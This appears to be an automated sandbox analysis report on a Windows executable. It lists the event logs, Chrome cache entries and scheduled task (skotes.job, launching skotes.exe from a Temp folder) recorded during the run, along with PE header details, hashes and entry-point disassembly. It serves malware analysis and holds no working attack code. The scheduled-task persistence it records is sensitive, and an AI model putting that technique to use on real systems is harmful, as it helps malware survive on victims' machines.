SHA-512:	27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
Malicious:	false
Preview:	ElfChnk.........l...............l...............@....^.....................................................................+t].................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......Q8.......................................................6......................**...............yM..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.3453151589728245
Encrypted:	false
SSDEEP:	384:BBNFR+Bb2M7tqZoqRMtsoFmx9oFSvnQYoxMtg6Wo9MtxLo9MtMozonuoxNo/Vo1k:BJ2j5g6U/Slv
MD5:	CF17EAD618F0647221A6166033BEBEC0
SHA1:	C19EEE33E182D7C8B451CB884401544A75C0C426
SHA-256:	6F2176993BA43C1184D15D4A1663AC69B651B69C22716803EF83AD3C390A5A08
SHA-512:	4546BAF0DDB8D683BB40A218A7844E9EDED208B95C01C40F8A14B57BB60D27FAC93298DF27783805C15A7B3D9D278E88C09087D30FFE4D6FE2946689869BE77D
Malicious:	false
Preview:	ElfChnk.................U.......Y...........8...H!..>..{.......................................................................................Z...s...h...................=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:...............................3...........................&...............................................>...................................**......U........8..3.........Wt.&........Wt...wX..9Ck?5.?.......A..3...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....\...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\Setup.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	67984
Entropy (8bit):	0.40450169750242826
Encrypted:	false
SSDEEP:	96:LKNVaO80onb8yhO20KNVaO80onb8yhO2:L8V7ohh+8V7ohh
MD5:	E2C1E9FB4D42828354AA4243357122B5
SHA1:	8898C1AD1E2E53AA67B7395CBA71D119C0AE2E11
SHA-256:	F293AEDBEA2D3B189B07223ABE4E45A0EEF76C50418254DFFC0644A725DFB634
SHA-512:	3C9EE6F889A464FD94C527A234D46990858353B23C771AEF02D17A8726E06A40116E4C43EE6734C31070D3922D335DC0AD58FAEDF825A0494FEC90E31045DB25
Malicious:	false
Preview:	ElfChnk..............................................\......................................................................C..............................................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**...............+...3............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\System.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	69304
Entropy (8bit):	4.457135034846554
Encrypted:	false
SSDEEP:	768:zcQKrvcj3QbcQKrLCXnLmLQXHmtpJnqiNHpzoQp:zcfrtbcfrW74MHmcs
MD5:	C5B649ACFC04BA6AA79538C7C737CEE0
SHA1:	1EFFADAB452101EC3A15DB07FB2AEBF2E4C2277D
SHA-256:	99A7ED63176CB5B82D4BB900171F0D1A2699A4BAFB5815FE3533CC54DD11EAD3
SHA-512:	063A5035D5E54461FA5CDA3F9ECF22531937CA4395EC3AC3DA69606390F4352BA94BD7CFC4D8E0675866687C9DFD3C9347DF457E81E985EECF593BA228C7E762
Malicious:	false
Preview:	ElfChnk.................n......................../....."......................................................................(....................s...h...................=...................................................N...............................Y...C...........w.......0.......................E...................................W...........).......M...3...:....................................................+......f........................!..............................1$......&...................**......y.........S..3............................................................................L.............!................@..S..3..M...j.G..].........L...y....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.U.s.e.r.M.o.d.e.P.o.w.e.r.S.e.r.v.i.c.e....9..@..w..I.S.y.s.t.e.m....n@O1$.......n@O@K.X7.~.......................A..-............=.......P.r.o.c.e.s.s.P.a.t.h.......A..+............=.......P.r.o.c.e.s.s.P.i.d.......A..1.......#....=.......O.l.d.S.c.h.e.m.e.G.u.i.d

C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	77088
Entropy (8bit):	3.852323873580452
Encrypted:	false
SSDEEP:	1536:jS/s2L20RjS/s2L20R0ztNPY3c9Nw0zEkkp:B
MD5:	9EE988EEC277A70993495DABCF498764
SHA1:	5EB39336E7A4ABDDD3A2C0E9ED5773CFB712CA5A
SHA-256:	25EF13C5E739D10D3C88075899558CC2964F1E910BE2954A735DA34C308FB62C
SHA-512:	786E6EDB414816BA238C698F8733523F132EB6C2951F1384B7FD0BAEA2B02E99333C1750C018A0635C52851533624DFF6A1BBCB93FECF407389C7906BA0CA977
Malicious:	false
Preview:	ElfChnk.................y....................(.. -..........................................................................[...............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............................................&.......................................................................**......y........DU..3.........B.&........B...._j..d.:Ad........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\DocumentsHDGDGHCAAK.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.338202303341948
Encrypted:	false
SSDEEP:	6:rBxVtXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lBvlIct0:lZf2RKQ1CGAFAjzvYRQVBv6ct0
MD5:	8E8120D7EEF61B4FE898A68D82CB5984
SHA1:	0371519415EFD6137D4CD34D4BBCE38FFF5CE055
SHA-256:	1A696A48CD14F9166ADAB13699E2406C32790A158DB8D1BA2B071D92EB153288
SHA-512:	8D53A42826350395879BF002AFD9E9742A36F1AF4CCC28C6B11D5A6F84E78FF98BBF5A2E40BAD52E8DFE62183BAC01B346B07944D01DAB6A9C7AEE7EC95CB8D5
Malicious:	false
Preview:	....N.s.O..E...Zly..F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

Chrome Cache Entry: 154

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2907)
Category:	downloaded
Size (bytes):	2912
Entropy (8bit):	5.849190367097889
Encrypted:	false
SSDEEP:	48:49Vp/q2X0KlgZ01ncm74aa9ld66666OGrBMHw44vxkkgDP3wqEhl3XyuLodWBvwG:4Y2Xli/Fd66666gQ44Z2fCQ6o4Bvw9zw
MD5:	AA27F23347213E5E69D25D062A513401
SHA1:	6285C0AC0E9E2480535FF93D29A6ED81070F92F7
SHA-256:	9CADC6FC9098414D955C0E5341D822F223E383F8576236A99F37E981E19F50FA
SHA-512:	18C76D200BD41A1ED92C3D975FB673399B2C7E66B08779B01010473B208EC7DDDBFFD5C4FA0542D149A3BBE40FCB73E42BB45CF9E2F2237C3B527C4B2F050936
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["raygun break dancing olympics","netflix outer banks audio issues","hannafords","snowfall las vegas","northern lights aurora forecast","arcane season 2 review","edwards helaire","ground round restaurants"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMWZwand3ejYxEhVGb290YmFsbCBydW5uaW5nIGJhY2syqwtkYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUM0QVFBTUJJZ0FDRVFFREVRSC94QUFhQUFBQ0F3RUJBQUFBQUFBQUFBQUFBQUFBQ0FVR0J3TUUvOFFBTlJBQUFRTURBd0lEQlFVSkFBQUFBQUFBQVFJREJBQUZFUVlTSVRGaFVYR0JFMEZDa2FFSEZD

Chrome Cache Entry: 155

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 156

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2586)
Category:	downloaded
Size (bytes):	174097
Entropy (8bit):	5.554845848492248
Encrypted:	false
SSDEEP:	3072:49GysOAIZQy3ZZb6L5BfizRURkgq3ocEs7BB19HDKDSfEISlCMDyQhnF/VU9cpar:49G3IZP3ZZmHfiz+R7q3ocV7BB19HDKq
MD5:	292ACC11525E24B0501DEAC4EB7B61D4
SHA1:	4840E1B06489D1210E25C620AC0E4DEA33F4A574
SHA-256:	A5CB759FC6BF64DD1E35731C88899928B098A359EFF9CA5B34B91F23ADE02C2B
SHA-512:	FBDB4B2B4B647F734B6E05D0495CE1135E9536D611BC567A3B47353FEC986B92412153C214EFE776BC6391239076B3DA6B79851C8BE036C00E4AD026F88CC683
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.ciOLm-Jy21Y.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTvi2-a6fPowp_OrDQczHs8e8wA2zQ"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.ej=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var fj,gj,ij,lj,oj,nj,hj,mj;fj=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};gj=function(){_.Ka()};ij=function(){hj===void 0&&(hj=typeof WeakMap==="function"?fj(WeakMap):null);return hj};lj=function(a,b){(_.jj\|\|(_.jj=new hj)).set(a,b);(_.kj\|\|(_.kj=new hj)).set(b,a)};.oj=function(a){if(mj===void 0){const b=new nj([],{});mj=Array.prototype.concat.call([],b).length===1}mj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.pj=function(a,b,c){a=_.zb(a,b,c);return Array.isArray(a)?a:_.Kc};_.qj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.rj=function(a,b){a===0&&(a=_.qj(a,b));return a\|1};_.sj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.tj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.xj=function(a,b,c,d,e,f,g){const h=a.ha;var k=!!(2&b);e=k?1:e;

Chrome Cache Entry: 157

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	133690
Entropy (8bit):	5.4329735320631904
Encrypted:	false
SSDEEP:	1536:i7C/VNg47Yp+GhGLhJgJoamyeX43zGiJsKtPLx8OF97f4qlgiCFlOve2dzAcJ82O:fh7vhSJjxeX431PBLx8OF9jMYsci2i6o
MD5:	3B13F7C8877C85D84B6304EE97562ECB
SHA1:	F2ABA370409C079CE5B92FE4BEA41AEA4C81C88D
SHA-256:	9FA300906D748706B9623A82A3E72762E354B279371312131D7E8D130C0AC301
SHA-512:	DC51C0AE08239A104B945BCE24BD0B0E13117393EDA0270C6E86471FC36336911EE29BDE3134DCC40F716A60FF426C02038DDA753694C892ABFD0834A30AB47D
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 158

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1302)
Category:	downloaded
Size (bytes):	117949
Entropy (8bit):	5.4843553913091005
Encrypted:	false
SSDEEP:	3072:D7yvvjOy7sipKTr3dH39oogNLLDzZzS7oF:D7yjOy7LS39mnhS7oF
MD5:	A5D33473ED0997C008D1C053E0773EBE
SHA1:	FEB4CB89145601A0141CC5869BEDF9AE7CD5CB80
SHA-256:	14C27BB0224FCF89A43B444B427DABE3D0AF184CAA7B6B4990CE228C51AE01C1
SHA-512:	3C0A48F9FA05469F950D9A268F1B3E9285A783A555EE597A2E203B688EB0FBCAEA3F4DE9BC8F5381C661007D0C6C4AFA70C19B7826D69A0E2A914A55973D14BD
Malicious:	false
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);.var da,ea,ha,na,oa,sa,ta,wa;da=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);na=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r

Chrome Cache Entry: 159

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.gyN29IQRsEA.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTthb_7uL8fi0CBKDba3xi6R0PUU9w"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 160

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.944672326899399
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'847'808 bytes
MD5:	ae6ab1aca8b68f61f6c9ecb97d418fb1
SHA1:	2b5c95867bd0231103cf1d900ce012c9019149db
SHA256:	2d1685358e826d1f0cad55eb2bae7fb87b4e40222dc947d2dfc217911ba6634c
SHA512:	0c816e7545f414c2e7e25bfdd1730c4b0706bddbd84da48f3757768de442e7479393e0504af429c7cadf81b72b2d2d50be3dd2337ae420ed038833015da8c1a8
SSDEEP:	49152:aUnOj0tKvsR4kUgGLojrQPiovOQD+VeuoluCjNi:aQJtKvBZLojsH7yVeuosCjY
TLSH:	548533B7A78721BECC1A64F545CE4803353DB34BE95D623E0219FBEB75A6E931AC0016
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xaaa000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F0148F92EBAh
movups xmm3, dqword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F0148F94EB5h
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
sub al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
jo 00007F0148F92EB7h
add byte ptr [ebp+67h], dh
dec edx
mov al, byte ptr [eax]
inc eax
and byte ptr [edx+3Dh], al
dec eax
imul edi, dword ptr [esi+0000003Dh], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24b04d	0x61	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24b1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x249000	0x16200	2d30ff2ee4cd457b87fed0d5175e1c66	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x24a000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
